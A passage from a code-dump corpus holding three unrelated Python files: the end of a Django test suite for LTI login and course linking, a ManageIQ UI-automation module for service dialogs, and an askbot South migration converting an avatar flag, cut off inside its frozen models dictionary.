uid=self.headers[u'lis_person_contact_email_primary']
).user)
@patch('lti.models.hash_lti_user_data')
def test_lti_user_unicode_username(self, hash_lti_user_data, mocked):
"""
Test unicode full name from LTI.
"""
mocked.return_value.is_valid_request.return_value = True
hashvalue = 'somehashvalue'
hash_lti_user_data.return_value = hashvalue
self.headers[u'user_id'] = 2
self.headers[u'lis_person_contact_email_primary'] = '[email protected]'
self.headers[u'lis_person_name_full'] = u'γγ€γ'
self.client.post('/lti/', data=self.headers, follow=True)
new_user = UserSocialAuth.objects.get(
uid=self.headers[u'lis_person_contact_email_primary']
).user
self.assertNotEqual(self.user, new_user)
self.assertEqual(new_user.username, hashvalue)
def test_lti_user_no_email(self, mocked):
del self.headers[u'lis_person_contact_email_primary']
mocked.return_value.is_valid_request.return_value = True
self.client.post('/lti/',
data=self.headers,
follow=True)
self.assertTrue(LTIUser.objects.filter(lti_consumer=self.lti_consumer).exists())
self.assertTrue(Role.objects.filter(role=Role.ENROLLED).exists())
self.assertNotEqual(LTIUser.objects.get(lti_consumer=self.lti_consumer).django_user,
User.objects.get(id=self.user.id))
@patch('lti.models.hash_lti_user_data')
def test_lti_user_no_username_no_email(self, hash_lti_user_data, mocked):
"""Test for non-existent username field
If there is no username in POST
we create user with random username.
"""
test_random_username = 'c'*32
del self.headers[u'lis_person_name_full']
del self.headers[u'lis_person_contact_email_primary']
mocked.return_value.is_valid_request.return_value = True
hash_lti_user_data.return_value = test_random_username[:30]
self.client.post('/lti/', data=self.headers, follow=True)
self.assertTrue(LTIUser.objects.filter(lti_consumer=self.lti_consumer).exists())
self.assertTrue(Role.objects.filter(role=Role.ENROLLED).exists())
self.assertNotEqual(LTIUser.objects.get(lti_consumer=self.lti_consumer).django_user,
User.objects.get(id=self.user.id))
self.assertEqual(
LTIUser.objects.get(lti_consumer=self.lti_consumer).django_user.username,
test_random_username[:30]
)
self.assertEqual(
len(LTIUser.objects.get(lti_consumer=self.lti_consumer).django_user.username),
30
)
def test_lti_user_link_social(self, mocked):
"""
Default LTI user creation process.
"""
social = UserSocialAuth(
user=self.user,
uid=self.headers[u'lis_person_contact_email_primary'],
provider='email'
)
social.save()
mocked.return_value.is_valid_request.return_value = True
self.client.post('/lti/',
data=self.headers,
follow=True)
self.assertTrue(LTIUser.objects.filter(lti_consumer=self.lti_consumer).exists())
self.assertTrue(Role.objects.filter(role=Role.ENROLLED).exists())
self.assertEqual(LTIUser.objects.get(lti_consumer=self.lti_consumer).django_user,
social.user)
def test_lti_user_timezone_positive(self, mocked):
self.user.profile.delete()
mocked.return_value.is_valid_request.return_value = True
self.client.post('/lti/', data=self.headers, follow=True, REMOTE_ADDR='194.242.96.17')
# update user, get it again with newly created profile
user = User.objects.get(id=self.user.id)
# profile should be created
self.assertIsNotNone(user.profile)
profile = Profile.objects.get(user=user)
self.assertEqual(profile.id, user.profile.id)
self.assertIsNotNone(profile.timezone)
# IP 194.242.96.17 should be associated with Europe/Zaporozhye TZ
self.assertEqual(profile.timezone, 'Europe/Zaporozhye')
def test_lti_user_timezone_default_value(self, mocked):
self.user.profile.delete()
mocked.return_value.is_valid_request.return_value = True
self.client.post('/lti/', data=self.headers, follow=True, REMOTE_ADDR='172.16.0.1')
# update user, get it again with newly created profile
user = User.objects.get(id=self.user.id)
# profile should be created
self.assertIsNotNone(user.profile)
profile = Profile.objects.get(user=user)
self.assertEqual(profile.id, user.profile.id)
self.assertIsNotNone(profile.timezone)
# IP 194.242.96.17 should be associated with Europe/Zaporozhye TZ
from django.conf import settings
self.assertEqual(profile.timezone, settings.TIME_ZONE)
@ddt
@patch('lti.views.DjangoToolProvider')
class ExceptionTest(LTITestCase):
"""
Test raising exception.
"""
@data(oauth2.MissingSignature, oauth2.Error, KeyError, AttributeError)
def test_exceptions(self, exception, mocked):
mocked.return_value.is_valid_request.side_effect = exception()
response = self.client.get('/lti/', follow=True)
self.assertTemplateUsed(response, template_name='lti/error.html')
class ModelTest(LTITestCase):
"""
Test model LTIUser.
"""
def test_lti_user_not_enrolled(self):
"""Test that user not enrolled yet"""
lti_user = LTIUser(user_id=self.user.id,
lti_consumer=self.lti_consumer,
extra_data=json.dumps(self.headers),
django_user=self.user)
lti_user.save()
self.role1.delete()
self.assertFalse(lti_user.is_enrolled('student', self.course.id))
def test_lti_user(self):
"""Test enrollment process"""
lti_user = LTIUser(user_id=self.user.id,
lti_consumer=self.lti_consumer,
extra_data=json.dumps(self.headers),
django_user=self.user)
lti_user.save()
lti_user.enroll('student', self.course.id)
self.assertTrue(lti_user.is_enrolled('student', self.course.id))
def test_lti_user_create_links(self):
"""Creating LTIUser without Django user
Testing Django user creation process.
"""
lti_user = LTIUser(user_id=self.user.id,
lti_consumer=self.lti_consumer,
extra_data=json.dumps(self.headers))
lti_user.save()
self.assertFalse(lti_user.is_linked)
lti_user.create_links()
self.assertTrue(lti_user.is_linked)
@ddt
@patch('lti.views.DjangoToolProvider')
class TestCourseRef(LTITestCase):
"""
Testing CourseRef object.
"""
def test_course_ref_roles(self, mocked):
"""Test different action for different roles"""
mocked.return_value.is_valid_request.return_value = True
self.course_ref.delete()
response = self.client.post('/lti/', data=self.headers, follow=True)
self.assertFalse(CourseRef.objects.filter(course=self.course).exists())
self.assertTemplateUsed(response, 'lti/error.html')
def test_create_courseref_only_lti(self, mocked):
"""
Test that only LTI is allowed.
"""
request = Mock()
request.session = {}
res = create_courseref(request)
self.assertEqual(res.content, 'Only LTI allowed')
@unpack
@data(('1', 'ct:course'), ('1111', 'ct:edit_course'))
def test_create_courseref_existence(self, context_id, langing_page, mocked):
"""
Test for existence/non-existence of CourseRef.
"""
_id = self.course.id if context_id == '1' else self.course.id + 1
lti_post = {'context_id': context_id,
'context_title': 'test title',
'tool_consumer_instance_guid': 'test.dot.com',
'roles': 'Instructor'}
request = Mock()
request.user = self.user
request.session = {'LTI_POST': lti_post,
'is_valid': True}
res = create_courseref(request)
self.assertEqual(res.url, reverse(langing_page, args=(_id,)))
@patch('lti.views.waffle.switch_is_active', return_value=False)
@patch('lti.views.DjangoToolProvider')
class TestUnit(LTITestCase):
"""
Testing Unit template rendering.
"""
def test_unit_render(self, mocked, switch):
mocked.return_value.is_valid_request.return_value = True
response = self.client.post(
'/lti/unit/{}/'.format(self.unit.id), data=self.headers, follow=True
)
self.assertTemplateUsed(response, 'ct/study_unit.html')
switch.return_value = True
response = self.client.post(
'/lti/unit/{}/'.format(self.unit.id), data=self.headers, follow=True
)
self.assertTemplateUsed(response, 'chat/main_view.html')
def test_instructor_enabled_404_wo_instructor_profile(self, mocked, switch):
"""
Checks redirect to the new Instructor UI but fail on became instructor.
"""
mocked.return_value.is_valid_request.return_value = True
switch.return_value = True
headers = self.headers.copy()
headers['roles'] = 'Instructor'
response = self.client.post(
'/lti/unit/{}/'.format(self.unit.id), data=headers, follow=True
)
_next = reverse('ctms:courslet_view', args=(self.course.id, self.unit.id))
self.assertRedirects(response, '{}?next={}'.format(reverse('accounts:profile_update'), _next))
@unpack
@data((Role.INSTRUCTOR, {u'roles': u'Instructor'}),
(Role.ENROLLED, {u'roles': u'Learner'}))
def test_instructor_enabled_w_instructor_profile_unit_view(self, mocked, switch):
"""
Checks redirect to the new Instructor UI on courselet detail page.
"""
mocked.return_value.is_valid_request.return_value = True
switch.return_value = True
headers = self.headers.copy()
headers['roles'] = 'Instructor'
Instructor.objects.create(user=self.user, institution='institute',
what_do_you_teach='something')
response = self.client.post(
'/lti/unit/{}/'.format(self.unit.id), data=headers, follow=True
)
assert response.status_code == 200
self.assertTemplateUsed(response, 'ctms/courselet_detail.html')
def test_instructor_enabled_w_instructor_profile_course_view(self, mocked, switch):
"""
Checks redirect to the new Instructor UI on course detail page.
"""
mocked.return_value.is_valid_request.return_value = True
switch.return_value = True
headers = self.headers.copy()
headers['roles'] = 'Instructor'
Instructor.objects.create(user=self.user, institution='institute',
what_do_you_teach='something')
response = self.client.post('/lti/', data=headers, follow=True)
assert response.status_code == 200
self.assertTemplateUsed(response, 'ctms/course_detail.html')
class AcceptanceTests(LTITestCase):
"""
Acceptance test to check different flows of handling LTI requests.
"""
def test_expired_consumer(self):
"""
Checking that expired consumer will not be used.
"""
self.lti_consumer.expiration_date = date.today() - timedelta(days=1)
response = self.client.post('/lti/', data=self.headers, follow=True)
self.assertTemplateUsed(response, 'lti/error.html')
@patch('lti.views.LtiConsumer.objects.filter')
def test_short_term_consumer(self, mocked_consumer):
"""
Test that user w/ short_term flag will be treated correctly.
"""
self.lti_consumer.expiration_date = date.today() + timedelta(days=1)
self.headers['custom_short_term'] = 'true'
response = self.client.post('/lti/', data=self.headers, follow=True)
mocked_consumer.assert_called_once_with(
consumer_key=self.headers['oauth_consumer_key']
)
@patch('lti.views.LtiConsumer.get_or_combine')
def test_typical_consumer(self, mocked_consumer):
"""
Typical LTi request (w/o short_term flag) will be treated w/ get_or_combine.
"""
self.lti_consumer.expiration_date = date.today() + timedelta(days=1)
response = self.client.post('/lti/', data=self.headers, follow=True)
mocked_consumer.assert_called_once_with(
self.headers['tool_consumer_instance_guid'],
self.headers['oauth_consumer_key'],
)
def test_no_consumer_found(self):
"""
If there is no LtiConsumer found throw error.
"""
self.lti_consumer.delete()
response = self.client.post('/lti/', data=self.headers, follow=True)
self.assertTemplateUsed(response, 'lti/error.html')
| apache-2.0 |
lkhomenk/integration_tests | cfme/automate/dialogs/service_dialogs.py | 6 | 4707 | import attr
from cached_property import cached_property
from navmazing import NavigateToAttribute, NavigateToSibling
from widgetastic.utils import Fillable
from widgetastic.widget import Text
from widgetastic_patternfly import CandidateNotFound
from cfme.exceptions import ItemNotFound
from cfme.modeling.base import BaseCollection, BaseEntity
from cfme.utils.appliance.implementations.ui import navigator, CFMENavigateStep, navigate_to
from widgetastic_manageiq import PaginationPane, Table
from . import AutomateCustomizationView, AddDialogView, EditDialogView
from .dialog_tab import TabCollection
class DialogsView(AutomateCustomizationView):
title = Text("#explorer_title_text")
paginator = PaginationPane()
table = Table(".//div[@id='list_grid' or @class='miq-data-table']/table")
@property
def is_displayed(self):
return (
self.in_customization and
self.title.text == 'All Dialogs' and
self.service_dialogs.is_opened and
self.service_dialogs.tree.currently_selected == ["All Dialogs"])
class DetailsDialogView(AutomateCustomizationView):
title = Text("#explorer_title_text")
@property
def is_displayed(self):
return (
self.in_customization and self.service_dialogs.is_opened and
self.title.text == 'Dialog "{}"'.format(self.context['object'].label)
)
@attr.s
class Dialog(BaseEntity, Fillable):
"""A class representing one Dialog in the UI."""
label = attr.ib()
description = attr.ib(default=None)
_collections = {'tabs': TabCollection}
def as_fill_value(self):
return self.label
@property
def dialog(self):
return self
@cached_property
def tabs(self):
return self.collections.tabs
@property
def tree_path(self):
return self.parent.tree_path + [self.label]
def update(self, updates):
""" Update dialog method"""
view = navigate_to(self, 'Edit')
changed = view.fill(updates)
if changed:
view.save_button.click()
else:
view.cancel_button.click()
view = self.create_view(DetailsDialogView, override=updates)
assert view.is_displayed
view.flash.assert_no_error()
if changed:
view.flash.assert_message(
'{} was saved'.format(updates.get('name', self.label)))
else:
view.flash.assert_message(
'Dialog editing was canceled by the user.')
def delete(self):
""" Delete dialog method"""
view = navigate_to(self, "Details")
view.configuration.item_select('Remove Dialog', handle_alert=True)
view = self.create_view(DialogsView)
assert view.is_displayed
view.flash.assert_no_error()
view.flash.assert_success_message(
'Dialog "{}": Delete successful'.format(self.label))
@property
def exists(self):
""" Returns True if dialog exists"""
try:
navigate_to(self, 'Details')
return True
except (CandidateNotFound, ItemNotFound):
return False
def delete_if_exists(self):
if self.exists:
self.delete()
@attr.s
class DialogCollection(BaseCollection):
"""Collection object for the :py:class:`Dialog`."""
tree_path = ['All Dialogs']
ENTITY = Dialog
def create(self, label=None, description=None):
""" Create dialog label method """
view = navigate_to(self, 'Add')
view.fill({'label': label, 'description': description})
return self.instantiate(
label=label, description=description)
@navigator.register(DialogCollection)
class All(CFMENavigateStep):
VIEW = DialogsView
prerequisite = NavigateToAttribute('appliance.server', 'AutomateCustomization')
def step(self):
self.view.service_dialogs.tree.click_path(*self.obj.tree_path)
@navigator.register(DialogCollection)
class Add(CFMENavigateStep):
VIEW = AddDialogView
prerequisite = NavigateToSibling('All')
def step(self):
self.prerequisite_view.configuration.item_select('Add a new Dialog')
@navigator.register(Dialog)
class Details(CFMENavigateStep):
VIEW = DetailsDialogView
prerequisite = NavigateToAttribute('appliance.server', 'AutomateCustomization')
def step(self):
self.prerequisite_view.service_dialogs.tree.click_path(*self.obj.tree_path)
@navigator.register(Dialog)
class Edit(CFMENavigateStep):
VIEW = EditDialogView
prerequisite = NavigateToSibling('Details')
def step(self):
self.prerequisite_view.configuration.item_select("Edit this Dialog")
| gpl-2.0 |
samhoo/askbot-realworld | askbot/migrations/0044_migrate_has_custom_avatar_field.py | 20 | 27460 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
from askbot.utils.console import print_action
from unidecode import unidecode
class Migration(DataMigration):
def forwards(self, orm):
"Write your forwards methods here."
print 'Migrating users to new avatar field'
for user in orm['auth.user'].objects.all():
print_action('migrating user: %s' % unidecode(user.username))
if user.has_custom_avatar == True:
user.avatar_type = 'a'
else:
user.avatar_type = 'n'
user.save()
print_action(
'user %s migrated avatar_type: %s' % \
(unidecode(user.username), user.avatar_type)
)
def backwards(self, orm):
"Write your backwards methods here."
pass
models = {
'askbot.activity': {
'Meta': {'object_name': 'Activity', 'db_table': "u'activity'"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'activity_type': ('django.db.models.fields.SmallIntegerField', [], {}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_auditted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['askbot.Question']", 'null': 'True'}),
'receiving_users': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'received_activity'", 'symmetrical': 'False', 'to': "orm['auth.User']"}),
'recipients': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'incoming_activity'", 'symmetrical': 'False', 'through': "orm['askbot.ActivityAuditStatus']", 'to': "orm['auth.User']"}),
'summary': ('django.db.models.fields.TextField', [], {'default': "''"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'askbot.activityauditstatus': {
'Meta': {'unique_together': "(('user', 'activity'),)", 'object_name': 'ActivityAuditStatus'},
'activity': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['askbot.Activity']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'status': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'askbot.anonymousanswer': {
'Meta': {'object_name': 'AnonymousAnswer'},
'added_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_addr': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'anonymous_answers'", 'to': "orm['askbot.Question']"}),
'session_key': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'summary': ('django.db.models.fields.CharField', [], {'max_length': '180'}),
'text': ('django.db.models.fields.TextField', [], {}),
'wiki': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'askbot.anonymousquestion': {
'Meta': {'object_name': 'AnonymousQuestion'},
'added_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_addr': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'is_anonymous': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'session_key': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'summary': ('django.db.models.fields.CharField', [], {'max_length': '180'}),
'tagnames': ('django.db.models.fields.CharField', [], {'max_length': '125'}),
'text': ('django.db.models.fields.TextField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '300'}),
'wiki': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'askbot.answer': {
'Meta': {'object_name': 'Answer', 'db_table': "u'answer'"},
'accepted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'accepted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'added_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'answers'", 'to': "orm['auth.User']"}),
'comment_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'deleted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'deleted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'deleted_answers'", 'null': 'True', 'to': "orm['auth.User']"}),
'html': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_edited_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'last_edited_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'last_edited_answers'", 'null': 'True', 'to': "orm['auth.User']"}),
'locked': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'locked_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'locked_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'locked_answers'", 'null': 'True', 'to': "orm['auth.User']"}),
'offensive_flag_count': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'answers'", 'to': "orm['askbot.Question']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'text': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'vote_down_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'vote_up_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'wiki': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'wikified_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
'askbot.answerrevision': {
'Meta': {'ordering': "('-revision',)", 'object_name': 'AnswerRevision', 'db_table': "u'answer_revision'"},
'answer': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'revisions'", 'to': "orm['askbot.Answer']"}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'answerrevisions'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'revised_at': ('django.db.models.fields.DateTimeField', [], {}),
'revision': ('django.db.models.fields.PositiveIntegerField', [], {}),
'summary': ('django.db.models.fields.CharField', [], {'max_length': '300', 'blank': 'True'}),
'text': ('django.db.models.fields.TextField', [], {})
},
'askbot.award': {
'Meta': {'object_name': 'Award', 'db_table': "u'award'"},
'awarded_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'badge': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'award_badge'", 'to': "orm['askbot.BadgeData']"}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'notified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'award_user'", 'to': "orm['auth.User']"})
},
'askbot.badgedata': {
'Meta': {'ordering': "('slug',)", 'object_name': 'BadgeData'},
'awarded_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'awarded_to': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'badges'", 'symmetrical': 'False', 'through': "orm['askbot.Award']", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'})
},
'askbot.comment': {
'Meta': {'ordering': "('-added_at',)", 'object_name': 'Comment', 'db_table': "u'comment'"},
'added_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'comment': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'html': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '2048'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'offensive_flag_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'comments'", 'to': "orm['auth.User']"})
},
'askbot.emailfeedsetting': {
'Meta': {'object_name': 'EmailFeedSetting'},
'added_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'feed_type': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'frequency': ('django.db.models.fields.CharField', [], {'default': "'n'", 'max_length': '8'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'reported_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'subscriber': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'notification_subscriptions'", 'to': "orm['auth.User']"})
},
'askbot.favoritequestion': {
'Meta': {'object_name': 'FavoriteQuestion', 'db_table': "u'favorite_question'"},
'added_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['askbot.Question']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'user_favorite_questions'", 'to': "orm['auth.User']"})
},
'askbot.markedtag': {
'Meta': {'object_name': 'MarkedTag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'reason': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'user_selections'", 'to': "orm['askbot.Tag']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'tag_selections'", 'to': "orm['auth.User']"})
},
'askbot.question': {
'Meta': {'object_name': 'Question', 'db_table': "u'question'"},
'added_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'answer_accepted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'answer_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'questions'", 'to': "orm['auth.User']"}),
'close_reason': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'closed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'closed_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'closed_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'closed_questions'", 'null': 'True', 'to': "orm['auth.User']"}),
'comment_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'deleted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'deleted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'deleted_questions'", 'null': 'True', 'to': "orm['auth.User']"}),
'favorited_by': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'favorite_questions'", 'symmetrical': 'False', 'through': "orm['askbot.FavoriteQuestion']", 'to': "orm['auth.User']"}),
'favourite_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'followed_by': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'followed_questions'", 'symmetrical': 'False', 'to': "orm['auth.User']"}),
'html': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_anonymous': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_activity_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_activity_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'last_active_in_questions'", 'to': "orm['auth.User']"}),
'last_edited_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'last_edited_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'last_edited_questions'", 'null': 'True', 'to': "orm['auth.User']"}),
'locked': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'locked_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'locked_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'locked_questions'", 'null': 'True', 'to': "orm['auth.User']"}),
'offensive_flag_count': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'summary': ('django.db.models.fields.CharField', [], {'max_length': '180'}),
'tagnames': ('django.db.models.fields.CharField', [], {'max_length': '125'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'questions'", 'symmetrical': 'False', 'to': "orm['askbot.Tag']"}),
'text': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '300'}),
'view_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'vote_down_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'vote_up_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'wiki': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'wikified_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
'askbot.questionrevision': {
'Meta': {'ordering': "('-revision',)", 'object_name': 'QuestionRevision', 'db_table': "u'question_revision'"},
'author': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'questionrevisions'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_anonymous': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'revisions'", 'to': "orm['askbot.Question']"}),
'revised_at': ('django.db.models.fields.DateTimeField', [], {}),
'revision': ('django.db.models.fields.PositiveIntegerField', [], {}),
'summary': ('django.db.models.fields.CharField', [], {'max_length': '300', 'blank': 'True'}),
'tagnames': ('django.db.models.fields.CharField', [], {'max_length': '125'}),
'text': ('django.db.models.fields.TextField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '300'})
},
'askbot.questionview': {
'Meta': {'object_name': 'QuestionView'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'viewed'", 'to': "orm['askbot.Question']"}),
'when': ('django.db.models.fields.DateTimeField', [], {}),
'who': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'question_views'", 'to': "orm['auth.User']"})
},
'askbot.repute': {
'Meta': {'object_name': 'Repute', 'db_table': "u'repute'"},
'comment': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'negative': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'positive': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['askbot.Question']", 'null': 'True', 'blank': 'True'}),
'reputation': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'reputation_type': ('django.db.models.fields.SmallIntegerField', [], {}),
'reputed_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'askbot.tag': {
'Meta': {'ordering': "('-used_count', 'name')", 'object_name': 'Tag', 'db_table': "u'tag'"},
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_tags'", 'to': "orm['auth.User']"}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'deleted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'deleted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'deleted_tags'", 'null': 'True', 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'used_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'askbot.vote': {
'Meta': {'unique_together': "(('content_type', 'object_id', 'user'),)", 'object_name': 'Vote', 'db_table': "u'vote'"},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
